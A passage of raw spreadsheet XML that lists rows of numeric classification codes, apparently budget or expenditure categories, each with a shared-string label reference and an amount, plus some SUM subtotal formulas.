      <c r="A1066" s="705">
        <v>2150599</v>
      </c>
      <c r="B1066" s="705" t="s">
        <v>1762</v>
      </c>
      <c r="C1066" s="707">
        <v>41</v>
      </c>
    </row>
    <row r="1067" spans="1:3">
      <c r="A1067" s="705">
        <v>21507</v>
      </c>
      <c r="B1067" s="706" t="s">
        <v>1763</v>
      </c>
      <c r="C1067" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1068" spans="1:3">
      <c r="A1068" s="705">
        <v>2150701</v>
      </c>
      <c r="B1068" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C1068" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1069" spans="1:3">
      <c r="A1069" s="705">
        <v>2150702</v>
      </c>
      <c r="B1069" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C1069" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1070" spans="1:3">
      <c r="A1070" s="705">
        <v>2150703</v>
      </c>
      <c r="B1070" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C1070" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1071" spans="1:3">
      <c r="A1071" s="705">
        <v>2150704</v>
      </c>
      <c r="B1071" s="705" t="s">
        <v>1764</v>
      </c>
      <c r="C1071" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1072" spans="1:3">
      <c r="A1072" s="705">
        <v>2150705</v>
      </c>
      <c r="B1072" s="705" t="s">
        <v>1765</v>
      </c>
      <c r="C1072" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1073" spans="1:3">
      <c r="A1073" s="705">
        <v>2150799</v>
      </c>
      <c r="B1073" s="705" t="s">
        <v>1766</v>
      </c>
      <c r="C1073" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1074" spans="1:3">
      <c r="A1074" s="705">
        <v>21508</v>
      </c>
      <c r="B1074" s="706" t="s">
        <v>1767</v>
      </c>
      <c r="C1074" s="269">
        <v>300</v>
      </c>
    </row>
    <row r="1075" spans="1:3">
      <c r="A1075" s="705">
        <v>2150801</v>
      </c>
      <c r="B1075" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C1075" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1076" spans="1:3">
      <c r="A1076" s="705">
        <v>2150802</v>
      </c>
      <c r="B1076" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C1076" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1077" spans="1:3">
      <c r="A1077" s="705">
        <v>2150803</v>
      </c>
      <c r="B1077" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C1077" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1078" spans="1:3">
      <c r="A1078" s="705">
        <v>2150804</v>
      </c>
      <c r="B1078" s="705" t="s">
        <v>1768</v>
      </c>
      <c r="C1078" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1079" spans="1:3">
      <c r="A1079" s="705">
        <v>2150805</v>
      </c>
      <c r="B1079" s="705" t="s">
        <v>1769</v>
      </c>
      <c r="C1079" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1080" spans="1:3">
      <c r="A1080" s="705">
        <v>2150806</v>
      </c>
      <c r="B1080" s="705" t="s">
        <v>1770</v>
      </c>
      <c r="C1080" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1081" spans="1:3">
      <c r="A1081" s="705">
        <v>2150899</v>
      </c>
      <c r="B1081" s="705" t="s">
        <v>1771</v>
      </c>
      <c r="C1081" s="707">
        <v>300</v>
      </c>
    </row>
    <row r="1082" spans="1:3">
      <c r="A1082" s="705">
        <v>21599</v>
      </c>
      <c r="B1082" s="706" t="s">
        <v>1772</v>
      </c>
      <c r="C1082" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1083" spans="1:3">
      <c r="A1083" s="705">
        <v>2159901</v>
      </c>
      <c r="B1083" s="705" t="s">
        <v>1773</v>
      </c>
      <c r="C1083" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1084" spans="1:3">
      <c r="A1084" s="705">
        <v>2159904</v>
      </c>
      <c r="B1084" s="705" t="s">
        <v>1774</v>
      </c>
      <c r="C1084" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1085" spans="1:3">
      <c r="A1085" s="705">
        <v>2159905</v>
      </c>
      <c r="B1085" s="705" t="s">
        <v>1775</v>
      </c>
      <c r="C1085" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1086" spans="1:3">
      <c r="A1086" s="705">
        <v>2159906</v>
      </c>
      <c r="B1086" s="705" t="s">
        <v>1776</v>
      </c>
      <c r="C1086" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1087" spans="1:3">
      <c r="A1087" s="705">
        <v>2159999</v>
      </c>
      <c r="B1087" s="705" t="s">
        <v>1777</v>
      </c>
      <c r="C1087" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1088" spans="1:3">
      <c r="A1088" s="705">
        <v>216</v>
      </c>
      <c r="B1088" s="706" t="s">
        <v>1778</v>
      </c>
      <c r="C1088" s="269">
        <v>1064</v>
      </c>
    </row>
    <row r="1089" spans="1:3">
      <c r="A1089" s="705">
        <v>21602</v>
      </c>
      <c r="B1089" s="706" t="s">
        <v>1779</v>
      </c>
      <c r="C1089" s="269">
        <f>SUM(C1090:C1098)</f>
        <v>886</v>
      </c>
    </row>
    <row r="1090" spans="1:3">
      <c r="A1090" s="705">
        <v>2160201</v>
      </c>
      <c r="B1090" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C1090" s="250">
        <v>185</v>
      </c>
    </row>
    <row r="1091" spans="1:3">
      <c r="A1091" s="705">
        <v>2160202</v>
      </c>
      <c r="B1091" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C1091" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1092" spans="1:3">
      <c r="A1092" s="705">
        <v>2160203</v>
      </c>
      <c r="B1092" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C1092" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1093" spans="1:3">
      <c r="A1093" s="705">
        <v>2160216</v>
      </c>
      <c r="B1093" s="705" t="s">
        <v>1780</v>
      </c>
      <c r="C1093" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1094" spans="1:3">
      <c r="A1094" s="705">
        <v>2160217</v>
      </c>
      <c r="B1094" s="705" t="s">
        <v>1781</v>
      </c>
      <c r="C1094" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1095" spans="1:3">
      <c r="A1095" s="705">
        <v>2160218</v>
      </c>
      <c r="B1095" s="705" t="s">
        <v>1782</v>
      </c>
      <c r="C1095" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1096" spans="1:3">
      <c r="A1096" s="705">
        <v>2160219</v>
      </c>
      <c r="B1096" s="705" t="s">
        <v>1783</v>
      </c>
      <c r="C1096" s="250">
        <v>81</v>
      </c>
    </row>
    <row r="1097" spans="1:3">
      <c r="A1097" s="705">
        <v>2160250</v>
      </c>
      <c r="B1097" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C1097" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1098" spans="1:3">
      <c r="A1098" s="705">
        <v>2160299</v>
      </c>
      <c r="B1098" s="705" t="s">
        <v>1784</v>
      </c>
      <c r="C1098" s="250">
        <v>620</v>
      </c>
    </row>
    <row r="1099" spans="1:3">
      <c r="A1099" s="705">
        <v>21606</v>
      </c>
      <c r="B1099" s="706" t="s">
        <v>1785</v>
      </c>
      <c r="C1099" s="269">
        <v>80</v>
      </c>
    </row>
    <row r="1100" spans="1:3">
      <c r="A1100" s="705">
        <v>2160601</v>
      </c>
      <c r="B1100" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C1100" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1101" spans="1:3">
      <c r="A1101" s="705">
        <v>2160602</v>
      </c>
      <c r="B1101" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C1101" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1102" spans="1:3">
      <c r="A1102" s="705">
        <v>2160603</v>
      </c>
      <c r="B1102" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C1102" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1103" spans="1:3">
      <c r="A1103" s="705">
        <v>2160607</v>
      </c>
      <c r="B1103" s="705" t="s">
        <v>1786</v>
      </c>
      <c r="C1103" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1104" spans="1:3">
      <c r="A1104" s="705">
        <v>2160699</v>
      </c>
      <c r="B1104" s="705" t="s">
        <v>1787</v>
      </c>
      <c r="C1104" s="250">
        <v>80</v>
      </c>
    </row>
    <row r="1105" spans="1:3">
      <c r="A1105" s="705">
        <v>21699</v>
      </c>
      <c r="B1105" s="706" t="s">
        <v>1788</v>
      </c>
      <c r="C1105" s="269">
        <v>98</v>
      </c>
    </row>
    <row r="1106" spans="1:3">
      <c r="A1106" s="705">
        <v>2169901</v>
      </c>
      <c r="B1106" s="705" t="s">
        <v>1789</v>
      </c>
      <c r="C1106" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1107" spans="1:3">
      <c r="A1107" s="705">
        <v>2169999</v>
      </c>
      <c r="B1107" s="705" t="s">
        <v>1790</v>
      </c>
      <c r="C1107" s="250">
        <v>98</v>
      </c>
    </row>
    <row r="1108" spans="1:3">
      <c r="A1108" s="705">
        <v>217</v>
      </c>
      <c r="B1108" s="706" t="s">
        <v>1791</v>
      </c>
      <c r="C1108" s="269">
        <v>71</v>
      </c>
    </row>
    <row r="1109" spans="1:3">
      <c r="A1109" s="705">
        <v>21701</v>
      </c>
      <c r="B1109" s="706" t="s">
        <v>1792</v>
      </c>
      <c r="C1109" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1110" spans="1:3">
      <c r="A1110" s="705">
        <v>2170101</v>
      </c>
      <c r="B1110" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C1110" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1111" spans="1:3">
      <c r="A1111" s="705">
        <v>2170102</v>
      </c>
      <c r="B1111" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C1111" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1112" spans="1:3">
      <c r="A1112" s="705">
        <v>2170103</v>
      </c>
      <c r="B1112" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C1112" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1113" spans="1:3">
      <c r="A1113" s="705">
        <v>2170104</v>
      </c>
      <c r="B1113" s="705" t="s">
        <v>1793</v>
      </c>
      <c r="C1113" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1114" spans="1:3">
      <c r="A1114" s="705">
        <v>2170150</v>
      </c>
      <c r="B1114" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C1114" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1115" spans="1:3">
      <c r="A1115" s="705">
        <v>2170199</v>
      </c>
      <c r="B1115" s="705" t="s">
        <v>1794</v>
      </c>
      <c r="C1115" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1116" spans="1:3">
      <c r="A1116" s="705">
        <v>21702</v>
      </c>
      <c r="B1116" s="706" t="s">
        <v>1795</v>
      </c>
      <c r="C1116" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1117" spans="1:3">
      <c r="A1117" s="705">
        <v>2170201</v>
      </c>
      <c r="B1117" s="705" t="s">
        <v>1796</v>
      </c>
      <c r="C1117" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1118" spans="1:3">
      <c r="A1118" s="705">
        <v>2170202</v>
      </c>
      <c r="B1118" s="705" t="s">
        <v>1797</v>
      </c>
      <c r="C1118" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1119" spans="1:3">
      <c r="A1119" s="705">
        <v>2170203</v>
      </c>
      <c r="B1119" s="705" t="s">
        <v>1798</v>
      </c>
      <c r="C1119" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1120" spans="1:3">
      <c r="A1120" s="705">
        <v>2170204</v>
      </c>
      <c r="B1120" s="705" t="s">
        <v>1799</v>
      </c>
      <c r="C1120" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1121" spans="1:3">
      <c r="A1121" s="705">
        <v>2170205</v>
      </c>
      <c r="B1121" s="705" t="s">
        <v>1800</v>
      </c>
      <c r="C1121" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1122" spans="1:3">
      <c r="A1122" s="705">
        <v>2170206</v>
      </c>
      <c r="B1122" s="705" t="s">
        <v>1801</v>
      </c>
      <c r="C1122" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1123" spans="1:3">
      <c r="A1123" s="705">
        <v>2170207</v>
      </c>
      <c r="B1123" s="705" t="s">
        <v>1802</v>
      </c>
      <c r="C1123" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1124" spans="1:3">
      <c r="A1124" s="705">
        <v>2170208</v>
      </c>
      <c r="B1124" s="705" t="s">
        <v>1803</v>
      </c>
      <c r="C1124" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1125" spans="1:3">
      <c r="A1125" s="705">
        <v>2170299</v>
      </c>
      <c r="B1125" s="705" t="s">
        <v>1804</v>
      </c>
      <c r="C1125" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1126" spans="1:3">
      <c r="A1126" s="705">
        <v>21703</v>
      </c>
      <c r="B1126" s="706" t="s">
        <v>1805</v>
      </c>
      <c r="C1126" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1127" spans="1:3">
      <c r="A1127" s="705">
        <v>2170301</v>
      </c>
      <c r="B1127" s="705" t="s">
        <v>1806</v>
      </c>
      <c r="C1127" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1128" spans="1:3">
      <c r="A1128" s="705">
        <v>2170302</v>
      </c>
      <c r="B1128" s="705" t="s">
        <v>1807</v>
      </c>
      <c r="C1128" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1129" spans="1:3">
      <c r="A1129" s="705">
        <v>2170303</v>
      </c>
      <c r="B1129" s="705" t="s">
        <v>1808</v>
      </c>
      <c r="C1129" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1130" spans="1:3">
      <c r="A1130" s="705">
        <v>2170304</v>
      </c>
      <c r="B1130" s="705" t="s">
        <v>1809</v>
      </c>
      <c r="C1130" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1131" spans="1:3">
      <c r="A1131" s="705">
        <v>2170399</v>
      </c>
      <c r="B1131" s="705" t="s">
        <v>1810</v>
      </c>
      <c r="C1131" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1132" spans="1:3">
      <c r="A1132" s="705">
        <v>21704</v>
      </c>
      <c r="B1132" s="706" t="s">
        <v>1811</v>
      </c>
      <c r="C1132" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1133" spans="1:3">
      <c r="A1133" s="705">
        <v>2170401</v>
      </c>
      <c r="B1133" s="705" t="s">
        <v>1812</v>
      </c>
      <c r="C1133" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1134" spans="1:3">
      <c r="A1134" s="705">
        <v>2170499</v>
      </c>
      <c r="B1134" s="705" t="s">
        <v>1813</v>
      </c>
      <c r="C1134" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1135" spans="1:3">
      <c r="A1135" s="705">
        <v>21799</v>
      </c>
      <c r="B1135" s="706" t="s">
        <v>1814</v>
      </c>
      <c r="C1135" s="269">
        <v>71</v>
      </c>
    </row>
    <row r="1136" spans="1:3">
      <c r="A1136" s="705">
        <v>2179902</v>
      </c>
      <c r="B1136" s="705" t="s">
        <v>1815</v>
      </c>
      <c r="C1136" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1137" spans="1:3">
      <c r="A1137" s="705">
        <v>2179999</v>
      </c>
      <c r="B1137" s="705" t="s">
        <v>1816</v>
      </c>
      <c r="C1137" s="707">
        <v>71</v>
      </c>
    </row>
    <row r="1138" spans="1:3">
      <c r="A1138" s="705">
        <v>219</v>
      </c>
      <c r="B1138" s="706" t="s">
        <v>1817</v>
      </c>
      <c r="C1138" s="269">
        <v>941</v>
      </c>
    </row>
    <row r="1139" spans="1:3">
      <c r="A1139" s="705">
        <v>21901</v>
      </c>
      <c r="B1139" s="706" t="s">
        <v>1818</v>
      </c>
      <c r="C1139" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1140" spans="1:3">
      <c r="A1140" s="705">
        <v>21902</v>
      </c>
      <c r="B1140" s="706" t="s">
        <v>1819</v>
      </c>
      <c r="C1140" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1141" spans="1:3">
      <c r="A1141" s="705">
        <v>21903</v>
      </c>
      <c r="B1141" s="706" t="s">
        <v>1820</v>
      </c>
      <c r="C1141" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1142" spans="1:3">
      <c r="A1142" s="705">
        <v>21904</v>
      </c>
      <c r="B1142" s="706" t="s">
        <v>1821</v>
      </c>
      <c r="C1142" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1143" spans="1:3">
      <c r="A1143" s="705">
        <v>21905</v>
      </c>
      <c r="B1143" s="706" t="s">
        <v>1822</v>
      </c>
      <c r="C1143" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1144" spans="1:3">
      <c r="A1144" s="705">
        <v>21906</v>
      </c>
      <c r="B1144" s="706" t="s">
        <v>1598</v>
      </c>
      <c r="C1144" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1145" spans="1:3">
      <c r="A1145" s="705">
        <v>21907</v>
      </c>
      <c r="B1145" s="706" t="s">
        <v>1823</v>
      </c>
      <c r="C1145" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1146" spans="1:3">
      <c r="A1146" s="705">
        <v>21908</v>
      </c>
      <c r="B1146" s="706" t="s">
        <v>1824</v>
      </c>
      <c r="C1146" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1147" spans="1:3">
      <c r="A1147" s="705">
        <v>21999</v>
      </c>
      <c r="B1147" s="706" t="s">
        <v>1825</v>
      </c>
      <c r="C1147" s="269">
        <v>941</v>
      </c>
    </row>
    <row r="1148" spans="1:3">
      <c r="A1148" s="705">
        <v>220</v>
      </c>
      <c r="B1148" s="706" t="s">
        <v>1826</v>
      </c>
      <c r="C1148" s="269">
        <v>4624</v>
      </c>
    </row>
    <row r="1149" spans="1:3">
      <c r="A1149" s="705">
        <v>22001</v>
      </c>
      <c r="B1149" s="706" t="s">
        <v>1827</v>
      </c>
      <c r="C1149" s="269">
        <f>SUM(C1150:C1175)</f>
        <v>4504</v>
      </c>
    </row>
    <row r="1150" spans="1:3">
      <c r="A1150" s="705">
        <v>2200101</v>
      </c>
      <c r="B1150" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C1150" s="707">
        <v>3800</v>
      </c>
    </row>
    <row r="1151" spans="1:3">
      <c r="A1151" s="705">
        <v>2200102</v>
      </c>
      <c r="B1151" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C1151" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1152" spans="1:3">
      <c r="A1152" s="705">
        <v>2200103</v>
      </c>
      <c r="B1152" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C1152" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1153" spans="1:3">
      <c r="A1153" s="705">
        <v>2200104</v>
      </c>
      <c r="B1153" s="705" t="s">
        <v>1828</v>
      </c>
      <c r="C1153" s="707">
        <v>91</v>
      </c>
    </row>
    <row r="1154" spans="1:3">
      <c r="A1154" s="705">
        <v>2200106</v>
      </c>
      <c r="B1154" s="705" t="s">
        <v>1829</v>
      </c>
      <c r="C1154" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1155" spans="1:3">
      <c r="A1155" s="705">
        <v>2200107</v>
      </c>
      <c r="B1155" s="705" t="s">
        <v>1830</v>
      </c>
      <c r="C1155" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1156" spans="1:3">
      <c r="A1156" s="705">
        <v>2200108</v>
      </c>
      <c r="B1156" s="705" t="s">
        <v>1831</v>
      </c>
      <c r="C1156" s="707">
        <v>24</v>
      </c>
    </row>
    <row r="1157" spans="1:3">
      <c r="A1157" s="705">
        <v>2200109</v>
      </c>
      <c r="B1157" s="705" t="s">
        <v>1832</v>
      </c>
      <c r="C1157" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1158" spans="1:3">
      <c r="A1158" s="705">
        <v>2200112</v>
      </c>
      <c r="B1158" s="705" t="s">
        <v>1833</v>
      </c>
      <c r="C1158" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1159" spans="1:3">
      <c r="A1159" s="705">
        <v>2200113</v>
      </c>
      <c r="B1159" s="705" t="s">
        <v>1834</v>
      </c>
      <c r="C1159" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1160" spans="1:3">
      <c r="A1160" s="705">
        <v>2200114</v>
      </c>
      <c r="B1160" s="705" t="s">
        <v>1835</v>
      </c>
      <c r="C1160" s="707">
        <v>573</v>
      </c>
    </row>
    <row r="1161" spans="1:3">
      <c r="A1161" s="705">
        <v>2200115</v>
      </c>
      <c r="B1161" s="705" t="s">
        <v>1836</v>
      </c>
      <c r="C1161" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1162" spans="1:3">
      <c r="A1162" s="705">
        <v>2200116</v>
      </c>
      <c r="B1162" s="705" t="s">
        <v>1837</v>
      </c>
      <c r="C1162" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1163" spans="1:3">
      <c r="A1163" s="705">
        <v>2200119</v>
      </c>
      <c r="B1163" s="705" t="s">
        <v>1838</v>
      </c>
      <c r="C1163" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1164" spans="1:3">
      <c r="A1164" s="705">
        <v>2200120</v>
      </c>
      <c r="B1164" s="705" t="s">
        <v>1839</v>
      </c>
      <c r="C1164" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1165" spans="1:3">
      <c r="A1165" s="705">
        <v>2200121</v>
      </c>
      <c r="B1165" s="705" t="s">
        <v>1840</v>
      </c>
      <c r="C1165" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1166" spans="1:3">
      <c r="A1166" s="705">
        <v>2200122</v>
      </c>
      <c r="B1166" s="705" t="s">
        <v>1841</v>
      </c>
      <c r="C1166" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1167" spans="1:3">
      <c r="A1167" s="705">
        <v>2200123</v>
      </c>
      <c r="B1167" s="705" t="s">
        <v>1842</v>
      </c>
      <c r="C1167" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1168" spans="1:3">
      <c r="A1168" s="705">
        <v>2200124</v>
      </c>
      <c r="B1168" s="705" t="s">
        <v>1843</v>
      </c>
      <c r="C1168" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1169" spans="1:3">
      <c r="A1169" s="705">
        <v>2200125</v>
      </c>
      <c r="B1169" s="705" t="s">
        <v>1844</v>
      </c>
      <c r="C1169" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1170" spans="1:3">
      <c r="A1170" s="705">
        <v>2200126</v>
      </c>
      <c r="B1170" s="705" t="s">
        <v>1845</v>
      </c>
      <c r="C1170" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1171" spans="1:3">
      <c r="A1171" s="705">
        <v>2200127</v>
      </c>
      <c r="B1171" s="705" t="s">
        <v>1846</v>
      </c>
      <c r="C1171" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1172" spans="1:3">
      <c r="A1172" s="705">
        <v>2200128</v>
      </c>
      <c r="B1172" s="705" t="s">
        <v>1847</v>
      </c>
      <c r="C1172" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1173" spans="1:3">
      <c r="A1173" s="705">
        <v>2200129</v>
      </c>
      <c r="B1173" s="705" t="s">
        <v>1848</v>
      </c>
      <c r="C1173" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1174" spans="1:3">
      <c r="A1174" s="705">
        <v>2200150</v>
      </c>
      <c r="B1174" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C1174" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1175" spans="1:3">
      <c r="A1175" s="705">
        <v>2200199</v>
      </c>
      <c r="B1175" s="705" t="s">
        <v>1849</v>
      </c>
      <c r="C1175" s="707">
        <v>16</v>
      </c>
    </row>
    <row r="1176" spans="1:3">
      <c r="A1176" s="705">
        <v>22005</v>
      </c>
      <c r="B1176" s="706" t="s">
        <v>1850</v>
      </c>
      <c r="C1176" s="269">
        <f>SUM(C1177:C1190)</f>
        <v>120</v>
      </c>
    </row>
    <row r="1177" spans="1:3">
      <c r="A1177" s="705">
        <v>2200501</v>
      </c>
      <c r="B1177" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C1177" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1178" spans="1:3">
      <c r="A1178" s="705">
        <v>2200502</v>
      </c>
      <c r="B1178" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C1178" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1179" spans="1:3">
      <c r="A1179" s="705">
        <v>2200503</v>
      </c>
      <c r="B1179" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C1179" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1180" spans="1:3">
      <c r="A1180" s="705">
        <v>2200504</v>
      </c>
      <c r="B1180" s="705" t="s">
        <v>1851</v>
      </c>
      <c r="C1180" s="707">
        <v>30</v>
      </c>
    </row>
    <row r="1181" spans="1:3">
      <c r="A1181" s="705">
        <v>2200506</v>
      </c>
      <c r="B1181" s="705" t="s">
        <v>1852</v>
      </c>
      <c r="C1181" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1182" spans="1:3">
      <c r="A1182" s="705">
        <v>2200507</v>
      </c>
      <c r="B1182" s="705" t="s">
        <v>1853</v>
      </c>
      <c r="C1182" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1183" spans="1:3">
      <c r="A1183" s="705">
        <v>2200508</v>
      </c>
      <c r="B1183" s="705" t="s">
        <v>1854</v>
      </c>
      <c r="C1183" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1184" spans="1:3">
      <c r="A1184" s="705">
        <v>2200509</v>
      </c>
      <c r="B1184" s="705" t="s">
        <v>1855</v>
      </c>
      <c r="C1184" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1185" spans="1:3">
      <c r="A1185" s="705">
        <v>2200510</v>
      </c>
      <c r="B1185" s="705" t="s">
        <v>1856</v>
      </c>
      <c r="C1185" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1186" spans="1:3">
      <c r="A1186" s="705">
        <v>2200511</v>
      </c>
      <c r="B1186" s="705" t="s">
        <v>1857</v>
      </c>
      <c r="C1186" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1187" spans="1:3">
      <c r="A1187" s="705">
        <v>2200512</v>
      </c>
      <c r="B1187" s="705" t="s">
        <v>1858</v>
      </c>
      <c r="C1187" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1188" spans="1:3">
      <c r="A1188" s="705">
        <v>2200513</v>
      </c>
      <c r="B1188" s="705" t="s">
        <v>1859</v>
      </c>
      <c r="C1188" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1189" spans="1:3">
      <c r="A1189" s="705">
        <v>2200514</v>
      </c>
      <c r="B1189" s="705" t="s">
        <v>1860</v>
      </c>
      <c r="C1189" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1190" spans="1:3">
      <c r="A1190" s="705">
        <v>2200599</v>
      </c>
      <c r="B1190" s="705" t="s">
        <v>1861</v>
      </c>
      <c r="C1190" s="707">
        <v>90</v>
      </c>
    </row>
    <row r="1191" spans="1:3">
      <c r="A1191" s="705">
        <v>22099</v>
      </c>
      <c r="B1191" s="706" t="s">
        <v>1862</v>
      </c>
      <c r="C1191" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1192" spans="1:3">
      <c r="A1192" s="705">
        <v>2209999</v>
      </c>
      <c r="B1192" s="705" t="s">
        <v>1863</v>
      </c>
      <c r="C1192" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1193" spans="1:3">
      <c r="A1193" s="705">
        <v>221</v>
      </c>
      <c r="B1193" s="706" t="s">
        <v>1864</v>
      </c>
      <c r="C1193" s="269">
        <v>8909</v>
      </c>
    </row>
    <row r="1194" spans="1:3">
      <c r="A1194" s="705">
        <v>22101</v>
      </c>
      <c r="B1194" s="706" t="s">
        <v>1865</v>
      </c>
      <c r="C1194" s="269">
        <f>SUM(C1195:C1205)</f>
        <v>2250</v>
      </c>
    </row>
    <row r="1195" spans="1:3">
      <c r="A1195" s="705">
        <v>2210101</v>
      </c>
      <c r="B1195" s="705" t="s">
        <v>1866</v>
      </c>
      <c r="C1195" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1196" spans="1:3">
      <c r="A1196" s="705">
        <v>2210102</v>
      </c>
      <c r="B1196" s="705" t="s">
        <v>1867</v>
      </c>
      <c r="C1196" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1197" spans="1:3">
      <c r="A1197" s="705">
        <v>2210103</v>
      </c>
      <c r="B1197" s="705" t="s">
        <v>1868</v>
      </c>
      <c r="C1197" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1198" spans="1:3">
      <c r="A1198" s="705">
        <v>2210104</v>
      </c>
      <c r="B1198" s="705" t="s">
        <v>1869</v>
      </c>
      <c r="C1198" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1199" spans="1:3">
      <c r="A1199" s="705">
        <v>2210105</v>
      </c>
      <c r="B1199" s="705" t="s">
        <v>1870</v>
      </c>
